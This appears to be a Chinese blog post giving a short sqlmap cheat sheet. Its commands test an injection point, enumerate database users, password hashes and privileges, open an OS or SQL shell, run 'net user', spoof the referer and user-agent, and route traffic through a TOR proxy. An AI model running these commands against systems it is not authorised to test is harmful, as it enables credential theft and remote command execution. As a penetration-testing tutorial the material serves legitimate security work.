SQLmap实战

本文介绍了SQLmap的多种实战技巧,包括基本使用、多语句测试、UNION注入、指纹识别、用户权限检查以及数据提取等,展示了SQLmap在不同数据库系统中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、实战mssql

判断注入类型 	python sqlmap.py -u 注入点

判断当前用户是否是dba 	python sqlmap.py -u 注入点 --is-dba -v 1

列举数据库用户 	python sqlmap.py -u 注入点 --users -v 0

列举数据库密码	python sqlmap.py -u 注入点 --passwords -v 0

查看用户权限 	python sqlmap.py -u 注入点 --privileges -v 0

执行命令	python sqlmap.py -u 注入点 --os-shell		-os-cmd=net user

2、基本使用

执行SQL语句·python sqlmap.py -u 注入点 -v 1 --sql-shell

更详细的信息 python sqlmap.py -u 注入点 -v 5

POST提交     python sqlmap.py -u 文件路径 --method POST --data 参数

cookie提交   python sqlmap.py -u 文件路径 --cookie 参数 -v 1

使用referer欺骗  python sqlmap.py -u 注入点 --referer referer地址 -v 3 

自定义user-agent 或者使用随机自带的user-agents.txt

	python sqlmap.py -u 注入点 --user-agent "自定义" -v 3
	python sqlmap.py -u 注入点 -v 1 -a "./txt/user-agents.txt"

使用基本认证  python sqlmap.py -u 注入点 --auth-type Basic --auth-cred "testuser:testpass" -v 3

使用Digest认证  python sqlmap.py -u 注入点 --auth-type Digest --auth-cred "testuser:testpass" -v 3

使用代理,配合TOR  python sqlmap.py -u 注入点 --proxy 代理ip

使用多线程猜解	python sqlmap.py -u 注入点 -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[\w][\w]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值